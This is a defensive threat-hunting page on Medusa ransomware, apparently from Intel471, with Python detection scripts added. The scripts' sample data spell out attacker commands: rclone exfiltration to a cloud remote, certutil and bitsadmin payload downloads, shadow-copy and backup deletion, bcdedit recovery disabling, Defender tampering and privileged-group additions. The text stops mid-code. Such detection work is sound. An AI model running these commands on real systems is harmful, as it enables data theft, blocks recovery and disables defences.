Threat Overview - Medusa Ransomware
UPDATE 03/25/2025: Since June 2021, Medusa ransomware, operating as a ransomware-as-a-service (RaaS), has been confirmed to have compromised over 300 organizations across critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. In March 2025, CISA released a Cybersecurity Advisory as part of its #StopRansomware effort, offering technical details identified through recent FBI investigations. The actors exploit unpatched vulnerabilities in public-facing applications and often work with initial access brokers to gain a foothold in networks. They have been observed using living-off-the-land techniques, leveraging legitimate system tools such as PowerShell and Windows Management Instrumentation (WMI) for reconnaissance and lateral movement. Medusa affiliates deploy tools such as Mimikatz for credential harvesting and use software deployment utilities such as PDQ Deploy and PsExec to distribute the ransomware payload. As noted in the earlier release of this collection, the ransomware encrypts data using AES-256, appends the ".medusa" extension to affected files, and deletes volume shadow copies to inhibit system recovery. In conjunction with the CISA advisory, threat hunters at Intel471 have updated the collection with additional Hunt Packages related to the following:
- Installation and usage of malicious tooling
- Privilege escalation by adding users to privileged security groups
- Manipulation of RDP-related settings to make a system easier to reach and compromise
Prior Information: Medusa Ransomware is a variant believed to have emerged in June 2021 that has become increasingly prolific. While "Medusa" appears in the names of other ransomware, malware, and botnets, this family is distinct from its similarly named competitors (such as MedusaLocker). The operators claim to exfiltrate data from compromised organizations in order to perform a "double-extortion attack": the threat actor not only encrypts compromised systems but also sells or publicly releases the exfiltrated data if the ransom is not paid. Medusa Ransomware appends a .MEDUSA file extension to the files it encrypts. Medusa Ransomware is considered an active threat and poses a significant, present risk that organizations should assess and prepare for.
Medusa Ransomware Hunt Package Collection
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Related Hunt Packages
Rclone Activity - Potential Data Exfiltration
Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A growing number of ransomware cases have been uncovered in which Rclone was used to exfiltrate files from victim machines.
Excessive Process and Service Stop Attempts - Potential Malware Infection
Malware and ransomware often kill legitimate services that could detect their activity before executing their commands. This package is intended to identify excessive occurrences of a process killing services.
Enabling RDP Connections through Registry Modification
This content is designed to detect modification of the registry key that enables and disables Remote Desktop Protocol (RDP) connections (the fDenyTSConnections value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server). This type of activity has been seen in the use of the SmokedHam tool by UNC2465 and its affiliates. False positives may occur depending on the environment, as administrators can legitimately modify these registry keys.
Suspicious BITS Activity - ScriptBlock
This package identifies activity in PowerShell logging associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.
Suspicious BITS Activity
This package identifies activity associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.
Possible Delayed Execution in CommandLine Argument Using Ping.exe and Loopback Address
This content is designed to detect when ping.exe is run with a high count for the -n flag against a loopback address. This technique is sometimes used to delay execution of the rest of the command, or of a chained command, while the ping runs.
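The delay pattern above, as an added example that is not part of the Intel471 hunt package: the code splits a command line on cmd.exe chaining operators, finds ping anywhere in each segment (it usually sits behind "cmd.exe /c"), and flags a high -n count against 127.x, ::1 or localhost. The sample command lines and the threshold of 10 are constructed for this example and are assumptions to tune per environment.

```python
import re

# Constructed sample command lines for this example (not real telemetry and not from the page)
SAMPLE_CMDLINES = [
    'cmd.exe /c ping -n 120 127.0.0.1 > nul & del /f /q C:\\Users\\Public\\stage.exe',
    'ping.exe -n 4 8.8.8.8',
    'cmd /c ping localhost -n 60 && "C:\\Temp\\update.exe"',
    'ping ::1 -n 2',
]

# Loopback targets that ping can be pointed at purely to burn time
LOOPBACK_RE = re.compile(r'^(?:127\.\d{1,3}\.\d{1,3}\.\d{1,3}|::1|localhost)$', re.IGNORECASE)
# cmd.exe chaining operators; "&&" and "||" are tried before the single "&"
CHAIN_RE = re.compile(r'\s*(?:&&|\|\||&)\s*')
MIN_COUNT = 10  # assumed threshold: "-n" values at or above this are treated as a deliberate delay


def find_ping_delay(cmdline, min_count=MIN_COUNT):
    """Return details when cmdline pings a loopback address with a high -n count, else None."""
    segments = CHAIN_RE.split(cmdline)
    for seg in segments:
        tokens = seg.split()
        # locate ping/ping.exe anywhere in the segment (it may sit behind "cmd.exe /c")
        idx = next((i for i, t in enumerate(tokens)
                    if t.strip('"').lower().rsplit('\\', 1)[-1] in ('ping', 'ping.exe')), None)
        if idx is None:
            continue
        count, target, i = None, None, idx + 1
        while i < len(tokens):
            tok = tokens[i]
            if tok.lower() == '-n' and i + 1 < len(tokens) and tokens[i + 1].isdigit():
                count = int(tokens[i + 1])
                i += 2
                continue
            if not tok.startswith('-') and LOOPBACK_RE.match(tok):
                target = tok
            i += 1
        if count is not None and target is not None and count >= min_count:
            return {'count': count, 'target': target,
                    'chained': len(segments) > 1, 'segment': seg.strip()}
    return None


def hunt(cmdlines):
    """Apply find_ping_delay to each command line and keep only the hits."""
    return [dict(cmdline=c, **hit) for c in cmdlines if (hit := find_ping_delay(c))]


if __name__ == '__main__':
    for h in hunt(SAMPLE_CMDLINES):
        print(h)
```

The "chained" field is the useful triage hint: a long loopback ping that is followed by a del or an execution in the same command line is the self-deletion or staged-execution pattern, whereas a lone ping with a high count is more often a scripted health check.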
SoftPerfect Network Scanner Write File Validation
This Threat Hunt package identifies use of the SoftPerfect Network Scanner tool to find share drives that allow write access for the user account being utilized. For additional logging requirements, see the Deployment Steps within the tool queries.
Taskkill.exe executed multiple times in a short period
This hunt is designed to capture when taskkill.exe is used multiple times on a single endpoint, or across the entire environment, in a short period of time. This behavior has been observed in relation to ransomware and other malicious software or actors attempting to cover their tracks or to disable security software on a compromised machine.
Potential Exfiltration - Common Rclone Arguments
This package identifies processes executed with common arguments associated with rclone activity used to exfiltrate data.
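The following is an added example covering both the "Rclone Activity" and "Common Rclone Arguments" packages above; it is not Intel471's hunt logic. The core signal it uses is a transfer sub-command (copy, sync, move) aimed at an rclone remote (name:path), because the binary is routinely renamed; the image name and the argument list are corroboration. The process events, the transfer-verb list and the argument watch-list are constructed assumptions.

```python
import re

# Constructed process-creation events for this example (not real telemetry)
SAMPLE_EVENTS = [
    {"host": "FS01", "image": "C:\\Users\\Public\\rclone.exe",
     "cmdline": 'rclone.exe copy "\\\\FS01\\Finance" mega:exfil --transfers 20 '
                '--multi-thread-streams 8 -q --ignore-existing --auto-confirm'},
    {"host": "WS12", "image": "C:\\Windows\\Temp\\svchost.exe",  # renamed binary
     "cmdline": 'svchost.exe sync D:\\Projects remote:backup --max-age 30d --transfers 8 --progress'},
    {"host": "WS07", "image": "C:\\Program Files\\rclone\\rclone.exe",
     "cmdline": 'rclone.exe version'},
    {"host": "WS09", "image": "C:\\Windows\\System32\\robocopy.exe",
     "cmdline": 'robocopy.exe C:\\src D:\\dst /E'},
]

# rclone sub-commands that move data; assumed list, extend as needed
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Flags commonly seen alongside exfiltration (speed, silence, filtering); assumed list
EXFIL_ARGS = {"--transfers", "--multi-thread-streams", "--ignore-existing", "--auto-confirm",
              "--max-age", "--min-size", "--max-size", "--no-check-certificate", "--progress",
              "-q", "-P", "--bwlimit"}
DRIVE_RE = re.compile(r'^[A-Za-z]:(?:$|[\\/])')   # C:\... is a local path, not a remote
REMOTE_RE = re.compile(r'^[A-Za-z0-9_-]+:')        # rclone remotes look like name:path


def is_remote(token):
    """True for an rclone remote reference such as mega:exfil, False for C:\\path."""
    return not DRIVE_RE.match(token) and REMOTE_RE.match(token) is not None


def classify(event):
    """Score one process event for rclone-style transfer activity."""
    tokens = [t.strip('"') for t in event["cmdline"].split()]
    image = event["image"].rsplit("\\", 1)[-1].lower()
    # first non-flag token after the binary is the sub-command
    # (flags that take a value before the verb, e.g. "--config x copy", are not handled here)
    verb = next((t.lower() for t in tokens[1:] if not t.startswith("-")), None)
    remotes = [t for t in tokens[1:] if is_remote(t)]
    args = sorted({t.split("=", 1)[0] for t in tokens if t.startswith("-")} & EXFIL_ARGS)
    return {
        "host": event["host"],
        "rclone_image": image == "rclone.exe",
        "verb": verb,
        "remotes": remotes,
        "args": args,
        # a transfer verb aimed at a remote is the core signal; the image name is
        # only corroboration because the binary is routinely renamed
        "suspicious": verb in TRANSFER_VERBS and bool(remotes),
    }


def hunt(events):
    return [r for r in map(classify, events) if r["suspicious"]]


if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r)
```

Note that the WS12 event fires even though nothing in the image path says rclone; that is the case a pure image-name hunt misses, and the matched argument list is what lets an analyst confirm it quickly.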
UAC Bypass Attempt via Elevated COM Abuse
This content is designed to detect User Account Control (UAC) bypass attempts that abuse common COM interfaces listed under the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList. These COM objects are designed to auto-elevate to a higher integrity level without a UAC prompt and can be manipulated to launch another process at that same higher level.
UAC Bypass Method - Cmstplua COM (Process Execution)
This content is designed to detect when the CMSTPLUA COM UAC bypass method is executed via DllHost.exe or CMSTP.exe.
Disabling Windows Security Services via Registry Edit Methods
This hunt package is designed to identify attempts to disable Windows security services through modification of the Windows registry. Windows security services are crucial to maintaining the security of a system, and disabling them can compromise the system's security posture, allowing an attacker to run code without security protections in place.
CertUtil file download
Identify suspicious downloads made with the built-in Windows tool CertUtil. CertUtil is not normally used to download executables or other files from the web, so its use to download files from the Internet should be considered suspicious.
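One detector for both the BITS packages and the CertUtil package above, added here as an example rather than taken from the hunt packages themselves. It checks process command lines for bitsadmin /transfer and for certutil switches that write a fetched URL to disk (-urlcache -f and -verifyctl -f -split), and checks PowerShell Script Block Logging text for Start-BitsTransfer. The sample command lines use a documentation-range address (198.51.100.7) and are constructed for this example.

```python
import re

# Constructed samples for this example (documentation-range IP 198.51.100.7; not real telemetry)
SAMPLE_PROCESS_CMDLINES = [
    'bitsadmin.exe /transfer job1 /download /priority high http://198.51.100.7/a.exe C:\\Users\\Public\\a.exe',
    'certutil.exe -urlcache -split -f http://198.51.100.7/b.exe C:\\Users\\Public\\b.exe',
    'certutil.exe -urlcache * delete',          # cache housekeeping, no URL: not a download
    'certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256',
]
SAMPLE_SCRIPTBLOCKS = [
    'Import-Module BitsTransfer; Start-BitsTransfer -Source "http://198.51.100.7/c.ps1" -Destination "$env:TEMP\\c.ps1"',
    'Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }',
]

URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\'<>]+', re.IGNORECASE)


def _basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def check_process(cmdline):
    """Flag bitsadmin transfers and certutil fetches that reference a URL."""
    tokens = cmdline.split()
    if not tokens:
        return None
    exe = _basename(tokens[0])
    switches = {t.lower().lstrip("-/") for t in tokens[1:]}
    urls = URL_RE.findall(cmdline)
    if exe == "bitsadmin.exe" and "transfer" in switches:
        return {"technique": "bitsadmin transfer", "urls": urls, "cmdline": cmdline}
    # -urlcache -f <url> <file> and -verifyctl -f -split <url> both write the fetched file to disk;
    # requiring a URL keeps cache listing/cleanup ("-urlcache * delete") out of the results
    if exe == "certutil.exe" and switches & {"urlcache", "verifyctl"} and urls:
        return {"technique": "certutil download", "urls": urls, "cmdline": cmdline}
    return None


def check_scriptblock(text):
    """Flag the BITS cmdlets (or bitsadmin invoked from PowerShell) in Script Block Logging text."""
    lowered = text.lower()
    if "start-bitstransfer" in lowered:
        return {"technique": "Start-BitsTransfer", "urls": URL_RE.findall(text), "scriptblock": text}
    if "bitsadmin" in lowered:
        return {"technique": "bitsadmin via PowerShell", "urls": URL_RE.findall(text), "scriptblock": text}
    return None


def hunt(process_cmdlines, scriptblocks):
    hits = [h for h in map(check_process, process_cmdlines) if h]
    hits += [h for h in map(check_scriptblock, scriptblocks) if h]
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_PROCESS_CMDLINES, SAMPLE_SCRIPTBLOCKS):
        print(h["technique"], h["urls"])
```

The extracted URL is worth carrying into the alert: a download from an internal update server and one from a bare external IP deserve very different triage priority, and the destination path (here C:\Users\Public and the temp directory) is the next pivot for the EDR search.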
Excessive Windows Discovery and Execution Processes - Potential Malware Installation
This package utilizes a list of commonly abused LOLBins (living-off-the-land binaries) which an attacker or malware would execute in quick succession. Multiple executions of programs from the list can be indicative of an infection or malicious activity on a victim host. To reduce false positives, use distinct counts per process name to require that more than 5 unique processes from the list were executed, rather than just checking that more than 6 events were generated on the host.
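The three threshold-style packages above ("Excessive Process and Service Stop Attempts", "Taskkill.exe executed multiple times" and "Excessive Windows Discovery and Execution Processes") share one mechanic: count events per host inside a sliding time window. The block below is an added example of that mechanic, not Intel471's query logic, and shows why the distinct-count variant matters: the WS02 host generates more events than WS01's discovery burst but never fires. The events, the LOLBin watch-list, the 5-minute window and the thresholds of 5 are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, host, image, command line); not real telemetry
SAMPLE_EVENTS = [
    # WS01: service/process killing followed by a burst of discovery
    ("2025-03-20T09:00:00", "WS01", "taskkill.exe", "taskkill /f /im sqlservr.exe"),
    ("2025-03-20T09:00:01", "WS01", "taskkill.exe", "taskkill /f /im veeam*"),
    ("2025-03-20T09:00:02", "WS01", "net.exe", "net stop MSSQLSERVER /y"),
    ("2025-03-20T09:00:03", "WS01", "sc.exe", "sc stop SQLWriter"),
    ("2025-03-20T09:00:04", "WS01", "taskkill.exe", "taskkill /f /im outlook.exe"),
    ("2025-03-20T09:00:05", "WS01", "net.exe", "net stop vss /y"),
    ("2025-03-20T09:01:00", "WS01", "whoami.exe", "whoami /all"),
    ("2025-03-20T09:01:05", "WS01", "net.exe", 'net group "domain admins" /domain'),
    ("2025-03-20T09:01:10", "WS01", "nltest.exe", "nltest /dclist:"),
    ("2025-03-20T09:01:15", "WS01", "ipconfig.exe", "ipconfig /all"),
    ("2025-03-20T09:01:20", "WS01", "systeminfo.exe", "systeminfo"),
    ("2025-03-20T09:01:25", "WS01", "arp.exe", "arp -a"),
    # WS02: a noisy but benign admin session; many events, one distinct binary, two kills
    ("2025-03-20T10:00:00", "WS02", "net.exe", "net user"),
    ("2025-03-20T10:00:30", "WS02", "net.exe", "net view"),
    ("2025-03-20T10:01:00", "WS02", "net.exe", "net share"),
    ("2025-03-20T10:01:30", "WS02", "net.exe", "net localgroup"),
    ("2025-03-20T10:02:00", "WS02", "net.exe", "net accounts"),
    ("2025-03-20T10:02:30", "WS02", "net.exe", "net session"),
    ("2025-03-20T10:03:00", "WS02", "net.exe", "net use"),
    ("2025-03-20T10:03:10", "WS02", "taskkill.exe", "taskkill /im notepad.exe"),
    ("2025-03-20T10:03:20", "WS02", "taskkill.exe", "taskkill /f /im chrome.exe"),
]

# Assumed watch-list of discovery LOLBins; tune per environment
DISCOVERY_LOLBINS = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe", "ipconfig.exe", "systeminfo.exe",
                     "arp.exe", "tasklist.exe", "qwinsta.exe", "nslookup.exe", "netstat.exe", "route.exe"}
WINDOW = timedelta(minutes=5)
KILL_THRESHOLD = 5        # kill/stop events per host per window
DISCOVERY_THRESHOLD = 5   # distinct watch-listed binaries per host per window


def parse_events(rows):
    return [{"ts": datetime.fromisoformat(ts), "host": h, "image": img.lower(), "cmdline": cmd}
            for ts, h, img, cmd in rows]


def is_kill(event):
    """taskkill in any form, or net/sc used with the stop verb."""
    args = event["cmdline"].lower().split()
    if event["image"] == "taskkill.exe":
        return True
    return event["image"] in {"net.exe", "net1.exe", "sc.exe"} and "stop" in args


def hunt(events, window=WINDOW, kill_threshold=KILL_THRESHOLD, discovery_threshold=DISCOVERY_THRESHOLD):
    """Slide a window over each host's events; fire each rule at most once per host."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        fired = set()
        for i, start in enumerate(evs):
            win = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            kills = sum(1 for e in win if is_kill(e))
            distinct = {e["image"] for e in win} & DISCOVERY_LOLBINS
            if kills >= kill_threshold and "excessive_kill" not in fired:
                fired.add("excessive_kill")
                findings.append({"host": host, "rule": "excessive_kill", "count": kills,
                                 "window_start": start["ts"].isoformat()})
            # distinct count, not raw event count, is what keeps WS02's seven "net" calls quiet
            if len(distinct) >= discovery_threshold and "excessive_discovery" not in fired:
                fired.add("excessive_discovery")
                findings.append({"host": host, "rule": "excessive_discovery", "count": len(distinct),
                                 "binaries": sorted(distinct), "window_start": start["ts"].isoformat()})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_EVENTS)):
        print(f)
```

In a SIEM the same logic is a time-bucketed aggregation grouped by host with a count of distinct process names; the Python version is useful for replaying an exported process log against candidate thresholds before committing them to the production query.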
Attempted Backup Deletion - Potential Ransomware Activity
This Hunt Package focuses on identifying commands associated with the deletion of backups, which is common activity among various ransomware groups. The provided hunt logic will identify processes that run commands associated with backup deletion and provide relevant context around the activity.
Volume Shadow Copy Service Disabled
This package is designed to capture the surrounding activity when the Volume Shadow Copy Service (VSS) is disabled.
Advanced IP Scanner Tool Utilization
This Threat Hunt package identifies instances where the Advanced IP Scanner tool was used within a target environment, which may be leveraged by malicious actors to perform network discovery. This package can also identify the activity when the tool is run as a portable executable instead of an installed application.
RDP Enabled Via NETSH
This hunt package is designed to capture the activity surrounding command-line arguments executed in order to enable Remote Desktop Protocol (RDP).
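Detection logic for the two RDP packages above ("Enabling RDP Connections through Registry Modification" and "RDP Enabled Via NETSH"), added as an example and not taken from the hunt packages. It normalises the native registry path form that Sysmon reports (\REGISTRY\MACHINE\...\ControlSet001) to the HKLM\...\CurrentControlSet form, so the same rule matches both, and reads DWORD data whether it arrives as "0" or as Sysmon's "DWORD (0x00000000)". The fDenyTSConnections = 0 and UserAuthentication = 0 (NLA off) semantics are standard Windows behaviour; the events themselves are constructed.

```python
import re

RDP_KEY = r"hklm\system\currentcontrolset\control\terminal server"

# Constructed registry-set and process-creation events; not real telemetry
SAMPLE_EVENTS = [
    {"type": "registry", "host": "WS01", "image": "reg.exe",
     "key": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Terminal Server",   # Sysmon-style path
     "value": "fDenyTSConnections", "data": "DWORD (0x00000000)"},
    {"type": "registry", "host": "WS01", "image": "powershell.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp",
     "value": "UserAuthentication", "data": "0"},
    {"type": "registry", "host": "WS02", "image": "svchost.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value": "fDenyTSConnections", "data": "1"},                                # RDP being turned off
    {"type": "process", "host": "WS01", "image": "netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"type": "process", "host": "WS03", "image": "netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'},
    {"type": "process", "host": "WS03", "image": "netsh.exe",
     "cmdline": "netsh interface show interface"},
]


def normalize_key(key):
    """Map native (\\REGISTRY\\MACHINE\\...\\ControlSet001) and HKLM spellings to one form."""
    k = key.strip().lower()
    k = k.replace("\\registry\\machine\\", "hklm\\")
    return re.sub(r"\\controlset\d{3}\\", r"\\currentcontrolset\\", k)


def dword(data):
    """Accept plain integers and Sysmon's 'DWORD (0x00000000)' rendering."""
    m = re.search(r"0x([0-9a-f]+)", data, re.IGNORECASE)
    return int(m.group(1), 16) if m else int(data)


def check_registry(e):
    key, value = normalize_key(e["key"]), e["value"].lower()
    if not key.startswith(RDP_KEY):
        return None
    if key == RDP_KEY and value == "fdenytsconnections" and dword(e["data"]) == 0:
        return "rdp_enabled_registry"           # 0 = allow Terminal Services connections
    if key.endswith(r"\winstations\rdp-tcp") and value == "userauthentication" and dword(e["data"]) == 0:
        return "nla_disabled_registry"          # NLA off: credential attacks without a prior logon
    return None


def check_netsh(e):
    cmd = e["cmdline"].lower()
    if e["image"].lower() != "netsh.exe" or "advfirewall" not in cmd:
        return None
    if "remote desktop" in cmd and "enable=yes" in cmd:
        return "rdp_firewall_netsh"
    if "localport=3389" in cmd and "action=allow" in cmd:
        return "rdp_port_allowed_netsh"
    return None


def hunt(events):
    hits = []
    for e in events:
        rule = check_registry(e) if e["type"] == "registry" else check_netsh(e)
        if rule:
            hits.append({"host": e["host"], "rule": rule, "image": e["image"]})
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h)
```

The image that performed the write is kept in the hit because it drives the false-positive handling the package description warns about: reg.exe or PowerShell writing fDenyTSConnections on a workstation is worth a look, the same value written by a Group Policy or endpoint-management process usually is not.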
Resize Shadow Storage with 'vssadmin'
This package identifies use of vssadmin to resize shadow storage, a method used by some ransomware actors to force deletion of existing shadow copies and hinder recovery.
User Added to Default Privileged Windows Security Groups
This package is designed to capture the activity surrounding the execution of command-line arguments that add a user to default privileged Windows security groups (local and domain).
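As an added example for the package above (not the package's own logic), the code below parses both the net.exe/net1.exe forms ("net localgroup <group> <member> /add", "net group <group> <member> /add /domain") and the PowerShell cmdlets Add-LocalGroupMember and Add-ADGroupMember, then checks the target group against lists of the default privileged groups. The command lines are constructed; the group lists mirror the built-in names but are assumptions to extend with any custom privileged groups.

```python
import re
import shlex

# Constructed command lines for this example; not real telemetry
SAMPLE_CMDLINES = [
    "net localgroup Administrators svc_backup /add",
    'net1 group "Domain Admins" jsmith /add /domain',
    'net localgroup "Remote Desktop Users" helpdesk /add',
    "net localgroup Administrators",                      # enumeration only
    "net user jsmith Passw0rd! /add",                      # account creation, not a group change
    "net localgroup Users jsmith /add",                    # group add, but not a privileged group
    "powershell.exe -c \"Add-LocalGroupMember -Group 'Administrators' -Member tmpadmin\"",
    'pwsh -Command Add-ADGroupMember -Identity "Domain Admins" -Members jsmith',
]

# Default privileged groups; assumed lists that mirror the built-in names, extend for custom groups
PRIVILEGED_LOCAL = {"administrators", "remote desktop users", "backup operators",
                    "remote management users", "hyper-v administrators"}
PRIVILEGED_DOMAIN = {"domain admins", "enterprise admins", "schema admins", "administrators",
                     "account operators", "backup operators", "server operators", "dnsadmins",
                     "group policy creator owners"}
PS_GROUP_RE = re.compile(
    r"(add-localgroupmember|add-adgroupmember)\b.*?-(?:group|identity)\s+[\"']?([^\"'\s]+(?:\s[^\"'\s-]+)*)",
    re.IGNORECASE)
PS_MEMBER_RE = re.compile(r"-members?\s+[\"']?([^\"'\s]+)", re.IGNORECASE)


def check_cmdline(cmdline):
    """Return {group, member, scope, privileged} when cmdline adds a member to a group, else None."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:
        tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    lowered = [t.lower() for t in tokens]
    if exe in {"net", "net.exe", "net1", "net1.exe"}:
        if len(tokens) < 4 or lowered[1] not in {"localgroup", "group"} or "/add" not in lowered:
            return None
        if tokens[3].startswith("/"):
            return None                         # "/add" right after the group name creates the group
        scope = "domain" if lowered[1] == "group" or "/domain" in lowered else "local"
        group, member = lowered[2], tokens[3]
    else:
        # PowerShell cmdlets: scan the whole line, the script is usually one quoted argument
        m = PS_GROUP_RE.search(cmdline)
        if not m:
            return None
        scope = "domain" if m.group(1).lower() == "add-adgroupmember" else "local"
        group = m.group(2).lower()
        mm = PS_MEMBER_RE.search(cmdline)
        member = mm.group(1) if mm else None
    privileged = group in (PRIVILEGED_DOMAIN if scope == "domain" else PRIVILEGED_LOCAL)
    return {"group": group, "member": member, "scope": scope, "privileged": privileged}


def hunt(cmdlines):
    """Keep only additions to privileged groups; non-privileged adds remain available for context."""
    out = []
    for c in cmdlines:
        r = check_cmdline(c)
        if r and r["privileged"]:
            out.append(dict(cmdline=c, **r))
    return out


if __name__ == "__main__":
    for h in hunt(SAMPLE_CMDLINES):
        print(h)
```

Command-line parsing is the cheap first pass; the authoritative record is Security event 4732 (local group) and 4728/4756 (domain groups), which also catch additions made through the GUI or through an API call with no command line at all.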
Suspicious bcdedit Activity - Potential Ransomware
BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to use bcdedit to modify the boot configuration and prevent recovery. This package identifies bcdedit being used with several common malicious arguments, such as delete and safeboot.
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting data on the victim host. This is typically carried out with PowerShell, vssadmin, or wmic. This package identifies activity by powershell, wmic, vssadmin, or vssvc with command-line arguments containing delete and variations of shadow.
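The recovery-inhibition packages above (Attempted Backup Deletion, Volume Shadow Copy Service Disabled, Resize Shadow Storage, Suspicious bcdedit Activity, and Shadow Copies Deletion) all watch the same pre-encryption phase. The block below is an added example of a combined rule set, not Intel471's hunt queries: each rule is a regular expression over the lower-cased command line, and a per-host summary counts distinct techniques, since two or more of them on one host in one session is a much stronger ransomware-staging signal than any single command. The events are constructed; the rule list is an assumption to extend.

```python
import re
from collections import defaultdict

# Constructed process-creation events (host, command line); not real telemetry
SAMPLE_EVENTS = [
    ("FS01", "vssadmin.exe delete shadows /all /quiet"),
    ("FS01", "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    ("FS01", "wmic.exe shadowcopy delete"),
    ("FS01", 'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"'),
    ("FS01", "bcdedit.exe /set {default} recoveryenabled No"),
    ("FS01", "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ("FS01", "wbadmin.exe delete catalog -quiet"),
    ("FS01", "sc.exe config VSS start= disabled"),
    ("WS02", "vssadmin.exe list shadows"),          # benign enumeration
    ("WS02", "bcdedit.exe /enum"),                  # benign enumeration
]

# Each rule is (name, regex over the lower-cased command line); first match wins
RULES = [
    ("vss_delete_shadows",           r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b"),
    ("vss_resize_storage",           r"\bvssadmin(?:\.exe)?\b.*\bresize\b.*\bshadowstorage\b"),
    ("wmic_shadowcopy_delete",       r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    ("ps_shadowcopy_delete",         r"win32_shadowcopy.*(?:\.delete\(|remove-wmiobject|remove-ciminstance)"),
    ("bcdedit_recovery_disabled",    r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+(?:no|off|false|0)\b"),
    ("bcdedit_ignore_boot_failures", r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b"),
    ("bcdedit_safeboot_or_delete",   r"\bbcdedit(?:\.exe)?\b.*(?:/delete\b|\bsafeboot\b)"),
    ("wbadmin_delete_backups",       r"\bwbadmin(?:\.exe)?\b.*\bdelete\b.*\b(?:catalog|systemstatebackup|backup)\b"),
    ("vss_service_disabled",         r"\bsc(?:\.exe)?\b.*\bconfig\b.*\bvss\b.*start=\s*disabled\b"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]


def match_rule(cmdline):
    lowered = cmdline.lower()
    for name, rx in COMPILED:
        if rx.search(lowered):
            return name
    return None


def hunt(events):
    return [{"host": h, "rule": r, "cmdline": c} for h, c in events if (r := match_rule(c))]


def summarize(hits, min_techniques=2):
    """Per host, count distinct techniques; several in one session is a strong staging signal."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["rule"])
    return {host: {"distinct_techniques": len(rules), "rules": sorted(rules),
                   "likely_ransomware_staging": len(rules) >= min_techniques}
            for host, rules in per_host.items()}


if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for h in hits:
        print(h["host"], h["rule"])
    print(summarize(hits))
```

The resize rule is the one most often left out of shadow-copy hunts: "resize shadowstorage /maxsize=401MB" never says delete, yet shrinking the store below what the existing copies need is exactly how they get purged.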
Common Ransomware Encrypted File Extensions
Ransomware commonly changes the file extensions of the files it encrypts. The most common extensions linked to ransomware can be identified and help associate the activity with a particular variant.
Powershell Encoded Command Execution
Looks for valid variations of the -EncodedCommand parameter (PowerShell accepts abbreviated forms such as -e, -ec, and -enc). This parameter is commonly used to encode or obfuscate commands, and not all occurrences are malicious; for example, benign complex commands may require encoding to run properly on a target system. Analysis of the encoded command, by base64-decoding the UTF-16LE payload, will be necessary.
Windows Defender Tampering - Possible Malware Activity
This package is designed to identify when PowerShell is used to tamper with Windows Defender in a way that makes a machine easier to compromise.
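One example serving the three packages "Powershell Encoded Command Execution", "Windows Defender Tampering" and "Disabling Windows Security Services via Registry Edit Methods"; it is added here and is not the hunt packages' own logic. It recognises every prefix of -EncodedCommand that powershell.exe accepts plus the -ec alias, decodes the base64/UTF-16LE payload, and then runs the tampering rules over the raw line and the decoded script together, so encoding does not hide a Set-MpPreference call. The samples are built in-code from known-plaintext scripts (so the base64 is real, not pasted) and include a payload that is valid base64 but not UTF-16LE to show the decoder failing safely; the rule set and the security-service name list are assumptions to extend.

```python
import base64
import re


def _ps_encode(script):
    """PowerShell's -EncodedCommand format: base64 over UTF-16LE text (used here only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines for this example; not real telemetry
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + _ps_encode("Set-MpPreference -DisableRealtimeMonitoring $true"),
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + _ps_encode("Add-MpPreference -ExclusionPath C:\\Users\\Public"),
    "powershell.exe -ec " + _ps_encode("Get-Service | Where-Object Status -eq Running"),   # encoded but benign
    'powershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true"',              # tampering in clear text
    "reg.exe add HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinDefend /v Start /t REG_DWORD /d 4 /f",
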